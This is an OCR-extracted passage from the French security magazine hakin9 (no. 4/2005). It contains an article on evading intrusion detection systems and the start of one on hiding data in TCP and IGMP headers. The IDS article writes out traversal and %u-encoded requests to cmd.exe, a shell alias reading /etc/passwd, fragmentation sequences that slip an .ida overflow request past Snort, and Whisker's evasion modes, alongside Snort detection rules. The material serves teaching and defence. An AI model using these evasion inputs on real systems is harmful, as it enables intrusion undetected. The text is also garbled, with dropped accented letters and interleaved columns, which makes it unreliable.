dows ainsi que l'Indexing Service des systmes Windows NT/2000/XP. Ces dispositifs rpertoire (en anglais directory tra-
sont ncessaires lors de l'installation du serveur Web de Microsoft IIS. versal), et c'est actuellement l'une
L'existence de ce bogue est due l'installation de certaines bibliothques de
des mthodes les plus utilises.
liens dynamiques (DLL) exige par le processus d'installation de Microsoft IIS. Une
La mthode expose ci-dessus
de ces DLL est la bibliothque partage idq.dll charge de fournir, entre autre chose,
n'est pas la seule possibilit. L'Uni-
un support pour les scripts de nature administrative (avec une extension en .ida).
Ce fichier contient une mmoire tampon non contrle dans la section charge de code est un mcanisme capable de
grer les adresses URL. Dans la mesure o idq.dll s'excute en tant que service du supporter l'ensemble des langues
systme, l'intrus obtiendra un contrle total sur le systme ainsi attaqu. du monde entier. Un serveur Web
Mais pire encore, il n'est pas ncessaire de lancer le processus idq.dll pour russir supportant l'Unicode remplacera
une attaque. Le pirate n'a besoin que de demander le service de dpouillement. tablir correctement la valeur Unicode par
une connexion avec le protocole HTTP puis envoyer une requte prpare en HTTP le caractre correspondant.
suffit garantir le succs d'une attaque. Pour le serveur Web, cette exem-
Un programme correctif complet a t sorti en 2002 (un an aprs la dcouverte ple de chane de caractres :
de ce bogue), malgr l'existence de nombreux serveurs encore vulnrables. En effet,
de nombreux administrateurs de Microsoft Windows n'appliquent pas les mises jours
../../c:\winnt\system32\cmd.exe
conseilles de scurit.

et la requte HTTP suivante :

une grande majorit de menaces
d'attaques. Toutefois, il est possible
de contourner la dtection d'intrusion
par signature. Voici les techniques tra-
ditionnelles employes cet effet :
obfuscation de code,
fragmentation,
refus de service.
Ces mthodes utilisent une activit
qui pousse le systme de dtection
d'intrusion voir un train de donnes
diffrent de celui du systme final, ou
dsactivent les systmes de dtec-
tion de donnes l'aide d'attaques
DoS (Denial of Service).
Obfuscation du code
La plupart des systmes de dtection
d'intrusion identifie les attaques au
moyen d'une analyse de signature.
Cette analyse de signature signifie
en ralit que le systme de dtection
d'intrusion est programm pour inter-
prter certaines sries de paquets de
donnes ou bien certaines parties de
donnes contenues dans ces paquets
comme une attaque. Par exemple,
un systme de dtection d'intrusion
charg de surveiller des serveurs Web
pourrait tre programm pour cher-
cher les paquets pigs ; une grande
majorit de mthodes fait bien sr
appel au protocole HTTP, mais, toutes
les donnes base de texte, telles que
les requtes SQL, sont ici impliques.
Ainsi, une requte classique du type
cgi-bin, par exemple, possde le for-
mat HTTP standard suivant :
GET /cgi-bin/script.cgi HTTP/1.0
Examinons le code suivant :
GET /cgi-bin/
quelque_chose_de_dangereux.pl
HTTP/1.0
Dans un environnement Web, une
double priode indique le rpertoire
parent, alors qu'une priode simple
reprsente le rpertoire du moment.
Le code suivant est alors identique
au prcdent. Toutefois, un systme
de dtection d'intrusion par signa-
ture peut considrer ce code comme
deux lments diffrents :
GET /./././cgi-bin/././././
quelque_chose_de_dangereux.pl
HTTP/1.0
De mme, quelqu'un pourrait par
exemple taper la requte suivante :
GET /cgi-bin/subdirectory/../
quelque_chose_de_dangereux.pl
HTTP/1.0
Dans ce cas, nous demandons un
sous-rpertoire puis utilisons la
%2e%2e%2f%2e%2e%2fc:
\winnt\system32\cmd.exe
sont strictement identiques. Toute-
fois, il est probable qu'un systme de
dtection d'intrusion n'interprte pas
les deux dclarations comme tant
les mmes. Le ver appel CodeRed
exploite la vulnrabilit du dborde-
ment de tampon lors de la gestion
des fichiers .ida (bogue prsent dans
le Indexing Service de Microsoft, voir
ce sujet lEncadr intitul Bogue
du Microsoft Indexing Server) afin
de s'introduire dans le systme pour
s'y propager. Si vous envoyez une
requte code %u, il est probable que
vous contourniez certains contrles
du systme de dtection d'intrusion
sur .ida. En effet, le caractre a peut
tre cod en tant que U+0061 sous
Unicode. Ainsi, la requte suivante :
GET /himom.id%u0061 HTTP/1.0
ne gnrera aucune alerte. Ce type
de contournement des systmes de
dtection d'intrusion est galement
connu sous le nom de %u encoding
IDS bypass vulnerability ou vulnrabi-
lit par codage %u pour contourner les
systmes de dtection d'intrusion.
Divers outils sont disponibles
pour tester les possibilits de con-
tournement des systmes de dtec-

hakin9 N o 4/2005 www.hakin9.org 53

 tion d'intrusion, mais le logiciel le
plus largement utilis en la matire
est Whisker (voir lEncadr intitul
Whisker outil anti-systme de d-
tection d'intrusion).
Considrons maintenant les
systmes de dtection d'intrusion
au niveau des htes ou HIDS (Host-
based Intrusion Detection Systems).
Si nous disposons dj d'un hte
fragilis et d'un HIDS, il nous faudra
raliser quelques ajustements afin
d'viter le filtrage des signatures.
Tous les systmes d'exploitation
d'aujourd'hui autorisent l'usage des
alias du shell et des variables d'envi-
ronnement. Pour les systmes *NIX,
un exemple assez dangereux res-
Whisker outil anti-systme
de dtection d'intrusion
Whisker est un logiciel conu pour pirater les serveurs Web en contournant les syst-
mes de dtection d'intrusion. Cet outil gnre de faon automatique une large varit
d'attaques anti systme de dtection d'intrusion. Cette caractristique lui a valu le sur-
nom de anti-IDS (AIDS). D'un point de vue technique, il s'agit d'un scanner CGI charg
de trouver les vulnrabilits du Web.
Les paramtres suivants sont la cause de certaines mthodes de contournement :
-I 1 mode 1 de contournement des systmes de dtection d'intrusion (codage
URL),
-I 2 mode 2 de contournement des systmes de dtection d'intrusion (insertion
des chemin des rpertoires /./),
-I 3 mode 3 de contournement des systmes de dtection d'intrusion (fin pr-
mature d'une URL),
-I 4 mode 4 de contournement des systmes de dtection d'intrusion (longue
URL),
-I 5 mode 5 de contournement des systmes de dtection d'intrusion (faux

semblerait la ligne suivante : paramtre),

# alias list_p=`more /etc/passwd`
L'exemple suivant, pour Windows
maintenant, serait tout aussi dange-
reux :
C:\> set shell=c:\winnt\system32\cmd.exe
Avec un tel hte et des alias dfinis
correctement, taper le code list _ p
or %shell% /c dir c: ne gnrera
aucune alerte.
Fragmentation
Le problme avec le rassemblage
des paquets fragments est que le
systme de dtection d'intrusion
doit conserver en mmoire le pa-
quet de donnes puis rassembler
intgralement ce paquet avant de le
comparer la chane. Le systme de
dtection d'intrusion doit galement
comprendre comment le paquet sera
rassembl par l'hte destinataire.
Les techniques les plus couran-
tes de fragmentation sont les suivan-
tes : chevauchement de fragments
ou fragment overlap, crasement
Science
-I 6 mode 6 de contournement des systmes de dtection d'intrusion (spara-
tion TAB inutilisable pour NT/IIS),
-I 7 mode 7 de contournement des systmes de dtection d'intrusion (sensibilit
la casse),
-I 8 mode 8 de contournement des systmes de dtection d'intrusion (dlimiteur
Windows),
-I 9 mode 9 de contournement des systmes de dtection d'intrusion (division
de session assez lent),
-I 0 mode 0 de contournement des systmes de dtection d'intrusion (mthode
NULL).
Whisker dispose d'une autre mthode de contournement trs pratique appele division
de session (session splicing). Cette mthode permet de diviser la chane en plusieurs
paquets de donnes la fois de manire empcher l'appariement des chanes. Par
exemple, si nous voulons envoyer la chane GET /, Whisker va la diviser en cinq pa-
quets contenant respectivement : G, E, T, 20 (reprsentation hexadcimale du caractre
espace) et /.
Afin d'viter de se faire piger par ces techniques, le systme de dtection d'intru-
sion devra comprendre entirement la session, tche difficile et lourde grer pour le
processeur. La rgle suivante de l'outil Snort dtecte un trafic dit Whisker destin au
port 80 avec un ensemble de drapeaux ACK, un espace (0x20) dans les donnes utiles
et un paramtre dsize de 1 (intercepte les deux premiers octets) :
alert tcp $EXTERNAL_NET any ->
$HTTP_SERVERS 80 (msg:
"WEB-MISC whisker space splice attack");
content:"|20|"; flags:A+; dsize:1;
reference:arachnids,296;
classtype:attempted-recon; reference
Toutefois, il faut bien tre conscient que cette mthode est facilement modifiable dans le
but de contourner un systme de dtection d'intrusion.

de fragments ou fragment overwrite

et temporisation de fragments ou
fragment time-out.
Chevauchement de fragments
Le chevauchement de fragment sur-
vient lorsqu'un hte, rassemblant
une squence de fragments, indique
que l'un des paquets reus contient
un fragment qui crase des donnes
issues d'un fragment prcdent.
Supposons que le premier frag-
ment contienne la chane GET x.idx,
et que le second contienne la chane
a? (voir la Figure 3). Une fois les pa-
quets assembls, le second fragment
crase le dernier octet du premier
fragment. Aprs le rassemblage
des paquets sur l'hte destinataire, la
chane complte sera alors GET x.ida?.
Sous le serveur Microsoft IIS ou sous
les systmes Windows dots du ser-
vice d'indexation activ et avec ce
bougue, cette chane gnrera un
dbordement de tampon.

54 www.hakin9.org hakin9 N o 4/2005


Systemes de dtection d'intrusion

fragments), il pourrait s'agir d'une

Listing 1. Signature par dfaut de Snort pour dtecter le dbordement tentative de dbordement de tampon
de tampon .ida ou encore de quelques URL acci-
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80
dentelles (inexistantes).
(msg:"WEB-IIS ISAPI .ida attempt"; uricontent:".ida?"; nocase;
dsize:>239; flags:A+; reference:arachnids,552; Temporisation de la
classtype:web-application-attack; fragmentation
reference:cve,CAN-2000-0071; sid:1243; rev:2;)
La temporisation dpend du temps
que le systme de dtection d'intru-
sion passe stocker les fragments
dans le mmoire avant de se d-
barrasser du paquet de donnes.
La plupart des systmes tempori-
seront un fragment incomplet en 60
secondes. Si le systme de dtection
d'intrusion ne gre pas le fragment
en 60 secondes, il est alors possible
d'envoyer des paquets de la faon
suivante :

fragment 1 GET x.id avec la ba-

lise de MF (More Fragments),
Figure 3. Contournement d'un IDS par chevauchement de fragments
fragment 2 a? (X secondes plus
tard).

Si le systme de dtection d'intru-

sion ne conserve pas le fragment
initial pendant plusieurs secondes,
il est alors possible de contourner le
systme.
La fragmentation peut tre com-
bine d'autres techniques, comme
par exemple mettre un terme aux
valeurs de dure de vie. Si l'hte est
assez vulnrable derrire le systme
Figure 4. Technique de l'crasement de fragments de dtection d'intrusion, celui-ci
peut voir un paquet qui expire avant
d'avoir atteint l'hte destinataire :

paquet 1 GET x.id avec une du-

re de vie >2,
paquet 2 s _ evasion.html avec
une dure de vie =1,
paque 3 a? avec une dure de
vie >2.

Dans cet exemple, le systme de

Figure 5. Technique de temporisation de la fragmentation
Ecrasement de fragments
La diffrence entre le chevauchement
de fragments et l'crasement de frag-
ments est que dans cette dernire m-
thode, un fragment complet crase le
fragment prcdent (voir la Figure 4).
Supposons de nouveau que nous en-
voyions trois fragments :
fragment 1 chane GET x.id,
fragment 2 quelques lments
alatoires,
fragment 3 chane a?.
Selon la manire dont l'hte ras-
semble les fragments (s'il favorise par
exemple les vieux ou les nouveaux
dtection d'intrusion considrera la
requte comme tant GET x.ids _
evasion.html ; toutefois, si le deuxi-
me paquet se temporise avant son
arrive chez l'hte, ce dernier verra
GET x.ida?.
Il est probable que la signature
par dfaut de Snort pour le dbor-
dement de tampon lors de la gestion
des fichiers .ida (voir le Listing 1)

hakin9 N o 4/2005 www.hakin9.org 55

 n'intercepte aucune de ces techni-
ques de fragmentation (des excep-
tions sont possibles si les codes de
prprocesseurs comme frag2 sont
utiliss ce genre de code tant ex-
cut avant le moteur de dtection).
Toutefois, Snort dispose d'une
signature pour dtecter les paquets
fragments :
alert ip $EXTERNAL_NET any
-> $HOME_NET any (msg:"MISC
Tiny Fragments"; fragbits:M;
dsize: < 25; classtype:bad-unknown;
sid:522)
De telles techniques peuvent gale-
ment tre mises en chec. Dans le
cas d'un exploit .ida, l'URL requise
n'est pas de grande importance.
Vous auriez donc pu excuter l'at-
taque frontale avec de nombreuses
donnes parasites afin d'viter le
dclenchement d'une rgle de frag-
ment :
paquet 1 GET une _ longue _
chane _ rendant _ impossible _
la _ dtection.com,
paquet 2 a?.
Dug Song a sorti l'outil fragroute,
charg de contrler de nombreu-
ses vulnrabilits lies la frag-
mentation. Snort vient rcemment
d'implanter des contrles et des
mthodes afin d'intercepter un plus
grand nombre de ruses au niveau du
rseau. Un nouvelle sortie officielle
devrait donc contenir un bon nombre
de ces contrles.
Attaques Denial
of Service (DoS)
L'objectif d'une attaque DoS sur-
charger le systme de dtection
d'intrusion de manire le faire
planter. Le but est atteint en fragili-
Science
sant la disponibilit des ressources
du systme, en sous-alimentant
les processus, en puisant les es-
paces consacrs au dbit rseau,
la mmoire, l'unit centrale
et au disque. Si quelqu'un cre trop
de trafic rseau, la capacit du syst-
me de dtection d'intrusion copier
des paquets partir d'un transfert
56
Glossaire
IDS (Intrusion Detection System) programme charg d'identifier des attaques ou
des violations de scurit en surveillant les activits du rseaux et des htes.
IPS (Intrusion Prevention System) logiciel charg de refuser l'accs des intru-
sions.
IDPS systme regroupant la fois les IDS et IPS.
HIDS (Host Intrusion Detection System) systme de dtection d'intrusion fonc-
tionnant sur l'hte surveill et charg de chercher les intrus.
NIDS (Network Intrusion Detection System) systme de dtection d'intrusion
charg d'analyser de manire passive le trafic rseau, en cherchant les activits
illgales.
NNIDS (Network Node Intrusion Detection System) solution hybride charge de
rassembler les systmes de dtection d'intrusion au niveau du rseau, en n'ana-
lysant toutefois qu'une partie (ou nud) du trafic rseau.
AIDS (Anti-IDS) outil anti-IDS permettant de contourner la dtection base de
signature des IDS.
CIDF ensemble de composants dfinissant un IDS.
Signature ensemble de rgles permettant un systme de dtection d'intrusion
d'identifier une menace.
Dbordement de tampon erreur survenant lorsqu'un programme ou un pro-
cessus tente de stocker plus de donnes dans un tampon (zone de stockage de
donnes temporaire) que la place prvue cet effet.
dans le tampon et la mmoire est prpares en fonction d'un nouveau
fragilise. Les paquet entrants type d'attaques DoS, ce n'est qu'une
sont alors omis, bien entendu. Par question de temps.
ailleurs, si quelqu'un gnre un trafic
chaotique considrable, une grande Le combat ternel
partie de la mmoire est alors requi- Il est probable que certaines tech-
se afin de rassembler les donnes, niques dcrites ci-dessus ne soient
ayant pour effet de provoquer une plus valides ou ne le sont qu'avec
insuffisance de mmoire pour les certains outils de dtection d'intru-
paquets entrants. Le trafic d'IP frag- sion particuliers, mais la logique de
ments requiert un grand nombre de ces techniques reste la mme. Les
cycles de l'unit centrale ce qui peut fausses attaques positives et nga-
s'avrer coteux galement. tives, les attaques DoS etc. rendent
De toute faon, un attaque classi- ces systmes inoffensifs en tant que
que par flux ncessite plusieurs sys- mcanismes de scurit tant que
tmes afin de dpasser les capacits ces derniers ne sont ni configurs
en pleine expansion des systmes ni maintenus correctement. L'ajout
de dtection d'intrusion, alors que de pots de miel, de systme de
l'exploitation d'un bogue n'a besoin protection contre les intrusions etc.
que d'un seul systme (mais est plus aux systmes grs en rseau ne
difficile raliser que la premire at- manquera pas de les aguerrir contre
taque). Les signatures sont toujours les risques de plantage. n
Sur Internet
http://www.monkey.org/~dugsong/fragroute la page d'accueil de l'outil fragroute,
http://www.snort.org le site de Snort : programme, documentation et signatures,
http://www.wiretrip.net/rfp le scanner CGI Whisker,
http://sans.org/rr une mine de documentation technique sur les solutions des
systmes de dtection d'intrusion,
http://www.microsoft.com/technet/security/bulletin/MS01-033.mspx le bogue
de dbordement de tampon lors de la gestion de fichiers .ida.
www.hakin9.org hakin9 N o 4/2005
 Stganographie rseau
dissimuler des donnes
dans les en-ttes TCP/IP
ukasz Wjcicki
S
tganographie : (en grec steganos de
Stgo, Stgein couvert, serr, dissi-
mul ; en franais graphie, suffixe tir
du grec : Graph criture, exprimant l'ide de
dessin, signes : org. grec Graphein graver,
crire, dessiner). Traduit du grec, ce terme
signifie une criture dissimule/cache, avec
la notion de sous couvert de, en tant compris
l'intrieur de. Les dbuts de la stganographie
remontent en fait l'Antiquit o dja les Anciens
tentaient de mettre des informations l'abri du
regard des autres. On crivait, par exemple, les
messages sur du bois qui tait ensuite recouvert
de cire sombre empchant ainsi la lecture par
opacit. En stganographie, on tente en plus,
de masquer la volont mme, de communiquer ;
ce qui la distingue de la cryptographie classique,
o l'on encrypte l'information de tel sorte, qu'elle
Science
devienne incomprhensible, pour les personnes
/parties non autorises qui pourraient y accder
dans sa forme crypte.
La stganographie rseau, qui consiste
dissimuler des informations l'intrieur du pro-
tocole de communication utilis est l'une des va-
riantes de la stganographie standard. Pour ces
protocoles, la notion du canal cach est en usa-
ge (covert channel). Ainsi, grce au canal cach,
58 www.hakin9.org
Les possibilits d'exploitations
des fins dtournes, de
certaines modalits structurelles
d'application du protocole
TCP/IP, ont contribu ce que
le masquage de donnes, dans
les datagrammes rseaux qu'il
contient, puisse devenir un
danger important, ou tout le
moins, soit considr en tant que
tel. La stganographie rseau,
ainsi nomme lorsqu'il s'agit de
cela, utilise les bits redondants
prsents dans les champs
obligatoires et facultatifs des en-
ttes TCP du mme protocole.
Cet article explique...
comment dissimuler des donnes dans les en-
ttes TCP et IGMP,
comment utiliser l'application covert_tcp dans
le domaine de la communication en rseau.
Ce qu'il faut savoir...
connatre le modle ISO/OSI qui relve de l'Ar-
chitecture des Rseaux,
avoir au moins une connaissance de base de la
famille de protocoles TCP/IP.
propos de l'auteur
ukasz Wjcicki poursuit ses tudes doctorales
l'cole Polytechnique de Varsovie. Jusqu'
prsent, il a coopr avec plusieurs services
d'information ; il a galement de l'exprience
dans l'administration des rseaux d'ordinateurs.
Actuellement, il surveille l'un des serveurs de
l'Institut de Tlcommunication l'cole Po-
lytechnique de Varsovie et il travaille dans la
socit Softax (http://www.softax.pl) en tant
que dveloppeur.
hakin9 N o 4/2005
 Stganographie rseau

informations destination ou en pro-

Protocole TCP/IP venance de rseaux protgs.
Le protocole TCP/IP fournit un ensemble de rgles, smantiques et syntaxiques,
ncessaires au fait de communiquer. Celles-ci comprennent et fixent les dtails en ce Cl au canal
qui concerne : le format du message, le support des rponses une requte donne, Le schma d'envoi des informations
et la gestion des erreurs. Le protocole est totalement indpendant des lments qui en stganographie rseau est pr-
composent ou font partie du rseau. sent sur la Figure 2. Un objet cach
TCP/IP est une famille de protocoles et de logiciels mettant disposition plusieurs (en anglais cover object) est un pa-
services rseaux ; c'est aussi une des solutions de base employe pour transmettre
quet de donnes Pk. Il sert mas-
les donnes via Internet.
quer ou cacher les informations.
La famille de protocoles TCP/IP est base sur la structure dite : modle en couche
Internet. La communication entre les ordinateurs se droule au niveau des couches
Pour pouvoir les cacher, il faut tout
correspondantes du modle, et, chaque couche, y dispose de son propre protocole d'abord crer un paquet stganogra-
de communication. Sur le rseau informatique rel, la communication est ralise uni- phique (en anglais stego-network
quement par le biais du niveau constitu par la couche physique prsente sur chaque packet) Sk. L'expditeur cache
machine. l'information Ck destine au desti-
La famille de protocoles TCP/IP ne garantit pas la scurit lors du transfert des nataire dans un paquet de rseau
informations vous n'y trouverez pas la garantie d'intgrit des donnes envoyes stganographique. Le paquet Sk est
ou l'authentification de l'expditeur des paquets. Dans certains cas, le fait d'utiliser la cr la base des paquets Ck et Pk.
redondance peut neutraliser les lacunes de scurit du protocole, mais son utilisation Il est galement possible d'utiliser
est galement une ouverture l'utilisation des canaux cachs (covert channels).
la cl secrte connue seulement de
l'expditeur et du destinataire.
Comme le processus de trans-
il est alors possible d'envoyer de l'in- possible d'exploiter certaines de ses mission des donnes ne se droule
formation pralablement dissimule structures o fonctionnalits de mise pas dans un canal idal, il existe
aux seules parties choisies, et de en application, pour atteindre un but donc des paquets stganographique
dtecter et rcuprer les donnes dtourn caractre bien souvent Sk* gnrs par hasard. Du point de
du cot du destinataire. La notion malveillant. Il est donc bon de bien vue de la communication rseau, si
de canal cach est explique sur la connatre, ce qui se rvle tre, les une telle situation a lieu, l'ordre des
Figure 1. faiblesses des protocoles appartenant paquets envoys risque de ne pas
La possibilit de cacher un mes- la famille TCP/IP (voir l'Encadr Pro- tre respect, ce qui influencera le
sage est lie un protocole de com- tocole TCP/IP) et plus prcisment contenu du message cach (Ck*).
munication dont il s'avre qu'il soit celles permettant de faire passer des Le mme paquet stganogra-
phique peut cependant passer par
plusieurs nuds intermdiaires
avant d'arriver au destinataire. Le
principe est que le covert channel
ne peut pas tre dtect. Autrement
dit, les nuds intermdiaires ne
peuvent pas noter la diffrence entre
les paquets Pk et Sk. La situation o
un paquet stganographique Sk sera
rejet (en anglais drop) cause de la
petite taille de la mmoire tampon du
Figure 1. Canal cach (covert channel) destinataire peut galement survenir.

Figure 2. Stganographie rseau schma d'envoi des informations

hakin9 N o 4/2005 www.hakin9.org 59

 Dans les algorithmes proposes,
la situation de ce type n'est pas prise
en compte si un paquet Sk gagne
le destinataire, il est soumis l'algo-
rithme de dtection afin d'obtenir une
information cache.

Manipuler les champs

redondants dans les
en-ttes du paquet
La manipulation des champs redon-
dants dans les en-ttes du paquet
peut tre l'un des algorithmes st-
ganographiques. Il arrive souvent Figure 3. En-tte du protocole TCP
que lors de la transmission, tous les
champs compris dans l'en-tte du
paquet ne soient pas ncessaires
un moment donn. Il est donc
possible de les utiliser afin de faire Figure 4. Combinaison redondante des bits
passer les diffrents messages.

TCP
Le protocole couche de transport
TCP (voir lEncadr Couches du
protocole TCP/IP) a t conu pour
crer des connexions infaillibles en-
tre les priphriques rseau dans
un environnement rseau compos.
Pour voir l'en-tte du protocole TCP,
reportez-vous la Figure 3.
L'en-tte du paquet TCP comprend
un champ Drapeaux de 6 bits. Les bits
en question (voir l'Encadr Drapeaux
des paquets TCP) dfinissent la
destination et le contenu du segment
TCP. la base de leur contenu, un
nud rseau sait comment interpr-
ter les autres champs dans l'en-tte.
Il existe 64 diffrentes combinaisons
des paramtres pour les bits donns
certaines sont redondantes, ce qui
permet de crer les canaux cachs.
La plupart des segments TCP
possdent le bit ACK positionn
(la valeur du bit ACK est gale
1) cela rsulte du fait que la
connexion TCP est ralise dans les
Science
Drapeaux des paquets TCP
URG (urgent) indicateur du mode urgent. Il informe si l'expditeur a pass en
mode urgent du protocole TCP. Cela a lieu lorsque quelque chose d'important se
produit un bout de la connexion et lorsqu'il faut en informer le plus vite possible
l'autre partie.
ACK (acknowledgement) signifie qu'un participant de la connexion envoie un
accus de rception (en anglais acknowledgment) pour confirmer la rception d'un
paquet de donnes.
PSH (push) si ce drapeau est dfini, le module de rception TCP doit transmettre
les donnes l'application le plus vite possible (mthode push).
RST (reset) signifie la mise zro de la connexion.
SYN (sync) signifie un segment de donnes comprenant un numro de squen-
ce initial qu'un participant va envoyer via cette connexion.
FIN (finish) signifie qu'un segment donn finit l'envoi des donnes.
Couches du protocole TCP/IP
Couche d'interface rseau reoit les datagrammes IP et les envoie via un rseau
donn.
Couche d'inter rseau elle est responsable de la communication entre les machi-
nes. Elle reoit les paquets de la couche de transport avec les informations ayant
pour but d'identifier le destinataire, elle encapsule le paquet dans le datagramme IP,
elle remplit son en-tte, elle vrifie si le datagramme doit tre envoy directement
au destinataire ou au routeur et elle transmet le datagramme une interface r-
seau.
Couche de transport sa tche principale est d'assurer la communication entre

deux sens ; c'est--dire en mode de
fonctionnement bidirectionnel simul-
tan (en anglais full duplex).
La combinaison redondante
des bits tmoins peut se prsenter
comme celle sur la Figure 4. Son in-
terprtation est la suivante : un parti-
cipant de la connexion envisage de
mettre fin l'change des donnes
les logiciels d'utilisateur. Cette couche peut rgler le transfert des informations.
Elle peut galement assurer son infaillibilit. Pour cela, elle organise l'envoi d'un
accus de rception par le destinataire et le nouvel envoi des paquets perdus par
l'expditeur.
Couche de logiciels utilitaires un niveau suprieur, les utilisateurs appellent
les logiciels utilitaires ayant l'accs aux services TCP/IP. Les logiciels utilitaires
cooprent avec l'un des protocoles de communication au niveau de la couche de
transport et ils envoient ou reoivent les donnes sous la forme des messages ou
du flux d'octets.

60 www.hakin9.org hakin9 N o 4/2005

 Stganographie rseau

(FIN = 1) et il envoie, en mme

Datagrammes temps, un accus de rception (le bit
Le datagramme est une unit de base des donnes envoyes, contenant l'en-tte et ACK est positionn). Le bit PSH est
les donnes. L'en-tte du datagramme comprend l'adresse de l'expditeur et du des- galement dfini pour envoyer im-
tinataire et un champ de type identifiant le contenu du datagramme. La datagramme mdiatement la requte la couche
(voir la Figure 5) ressemble une trame du rseau physique. La diffrence est que d'application. Jusqu' ce que le bit
l'en-tte de la trame comprend les adresses physiques et que l'en-tte du datagramme URG (urgent) ne soit pas positionn,
est constitu des adresses IP. La solution o un datagramme est transmis par la trame un segment TCP envoy comprend
rseau est appele l'encapsulation. Le datagramme se comporte alors comme tout
16 bits redondants. Ceux-ci peuvent
autre message envoy d'une machine l'autre et il se dplace dans la partie de la
tre utiliss comme un canal cach.
trame rseau rserve aux donnes (Figure 6).
La mme redondance existe
galement dans tous les cas o le
bit URG n'est pas positionn. Le bit
SYN positionn peut crer gale-
ment des combinaisons avec un bit
ACK dfini ou les bits URG/PSH (les
deux ne peuvent pas tre position-
ns en mme temps). Si c'est le cas,
les autres valeurs des bits sont sans
importance et il est toujours possible
de crer des covert channels.

IGMP
La diffusion multiple (en anglais
multicasting) consiste envoyer les
donnes seulement un groupe
donn des priphriques rseau.
Les routeurs et les htes supportant
Figure 5. Structure du datagramme IP la diffusion multiple doivent utiliser le
protocole IGMP pour changer les
informations au sujet de l'apparte-
nance des htes donns un groupe
spcifi de ce type de diffusion.
Dans le protocole IGMP, il existe
deux types de messages :

les messages de rapport (en

Figure 6. Position du datagramme dans la trame rseau
anglais report messages) ; en-
voys de l'hte au routeur se
connecter au groupe, appartenir
Champs du protocole IGMP toujours au mme groupe, quitter
Type de message IGMP (8 bits). le groupe,
Temps maximal de rponse (en anglais max response time) occupe 8 bits ; il est les messages de requte (en an-
prsent seulement dans les messages de requte et il dfinit le temps maximal glais query messages) ; envoys
entre l'envoi de la requte d'appartenance un groupe donn (en anglais host du routeur l'hte surveiller le
membership query) et la rception du rapport d'appartenance un groupe donn groupe.
(en anglais host membership report) ; pour les autres types de messages, ce
champ a la valeur 0 et il est ignor. Lors de la transmission, IGMP est
Somme de contrle (16 bits).
encapsul dans le datagramme IP
Adresse du groupe (32 bits) pour les messages de requte gnrale, dans le
voir l'Encadr Datagrammes.
cas o une requte est dirige vers tous les groupes, ce champ est positionn
La longueur du message IGMP est
0 (en anglais general query). Il prend une adresse donne du groupe si la requ-
te est envoye un groupe spcifique (en anglais group-specific query). Pour les fixe et elle est de 8 octets (voir gale-
messages de rapport concernant l'appartenance un groupe donn (en anglais ment l'Encadr Champs du protocole
membership report), ce champ a la valeur de l'adresse du groupe concern par IGMP). Lors de son encapsulation
la diffusion multiple et pour les messages d'abandon de groupe (en anglais leave dans le datagramme IP, le champ du
group message) l'adresse du groupe quitt. protocole a la valeur 2. Le message
IGMP est encapsul dans le data-

hakin9 N o 4/2005 www.hakin9.org 61

 gramme IP de sorte que la partie fixe
de l'en-tte IP occupe 20 octets et le
message IGMP 8 octets. Le paquet
comprenant IGMP se dplace sur le
rseau selon les rgles standard :
il peut tre perdu, dupliqu ou d'autres
erreurs peuvent se produire.
Dans la situation idale, le da-
tagramme entier se tient dans une
trame physique. Pourtant, cela n'est
pas toujours possible. Il est ainsi vu
que le datagramme peut se dplacer
via les diffrents rseaux physiques
dont chacun dispose d'un nombre li-
mite des donnes envoyer dans une
trame. Ce paramtre du rseau s'ap-
pelle l'unit maximale de transmis-
sion d'un rseau donn (en anglais
Maximum Transfer Unit MTU).
La limitation de la taille des data-
grammes de sorte qu'ils correspon-
dent une MTU la plus petite serait
inefficace si l'on passait travers des
rseaux capables de transmettre les
cadres de taille suprieure. Si un da-
Figure 7. Message IGMP encapsul dans l'en-tte IP tagramme ne tient pas dans une trame
physique, il est dcoup en plus petits
morceaux appels les fragments
le processus lui-mme s'appelle la
fragmentation. Une fois que les data-
grammes fragments gagnent le desti-
nataire, ils sont soumis un processus
inverse, savoir la dfragmentation.
En outre, chaque fragment comprend
une en-tte o la plupart du contenu
de l'en-tte du datagramme initial est
dupliqu (sauf le champ Instructions
indiquant que c'est un fragment).
Les messages IGMP sont dis-
Figure 8. Matrice des combinaisons des bits redondants dans l'en-tte IP ponibles sous les deux formes sui-
avec un message IGMP vantes :

le rapport d'appartenance un
groupe donn (en anglais host
membership report) et le mes-
sage informant sur la sortie du
groupe (en anglais leave group
message) ; les messages sont
Science

envoys de l'hte au routeur,

le message de requte concer-
nant l'appartenance un groupe
donn (en anglais membership
query message) ; le message est
envoy du routeur l'hte.

En prenant en compte les informa-

Figure 9. Utiliser le champ Identification expditeur tions ci-dessus sur le protocole IGMP,

62 www.hakin9.org hakin9 N o 4/2005

 Stganographie rseau

il est possible de distinguer les types
de datagrammes IP suivants :
de l'hte au routeur avec la frag-
mentation autorise,
de l'hte au routeur la fragmen-
tation est interdite,
du routeur l'hte avec la frag-
mentation autorise,
du routeur l'hte la fragmenta-
tion est interdite.
Une mthode de ce type est utilise
par l'application covert_tcp cre par
Craig H. Rowland. Aprs avoir mo-
difi le code, l'application peut servir
galement cacher les informations
dans les champs redondants prsents
dans les en-ttes des protocoles. co-
vert_tcp n'utilise pas la dernire possi-
bilit tant donn qu'il est facile de se
protger contre ce type de messages
cachs (les champs redondants sont
souvent filtrs par les priphriques
rseau adquats).
L'application en question uti-
lise les champs obligatoires suivants
dans l'en-tte du protocole TCP/IP :
le champ Identification dans
le datagramme IP c'est un
champ unique utilis dans le

Pour la structure approprie du

datagramme IP l'un datagramme
aprs l'autre, de 16 bits on reoit
la matrice 16x16 (voir la Figure 8).
L'objectif est d'employer 8 bits non
utiliss dans les rapports d'apparte-
nance IGMP et 16 bits positionns
0 par l'expditeur dans les requtes
concernant l'appartenance IGMP.
Le format du message IGMP encap-
sul dans l'en-tte IPv4 est prsent
sur la Figure 7.
En disposant de la matrice 16x16
ainsi cre, il est noter que ses Figure 10. Utiliser le champ Identification destinataire
rangs qui sont aux numros :

2, 5, 11, 12, 13 pour les messa-

ges de rapport IGMP (avec la
fragmentation autorise),
2, 4, 5, 11, 12, 13 pour les mes-
sages de rapport IGMP (la frag-
mentation interdite),
2, 5, 11, 12, 15, 16 pour les requ-
tes IGMP (avec la fragmentation
autorise),
2, 4, 5, 11, 12, 15, 16 pour les
requtes IGMP (la fragmentation Figure 11. Rsultat de fonctionnement du logiciel Nmap sur le rseau de
interdite), communication stganographique

peuvent tre utiliss pour faire pas-

ser les informations caches via le
rseau TCP/IP.

Manipuler les champs

obligatoires dans les
en-ttes du paquet
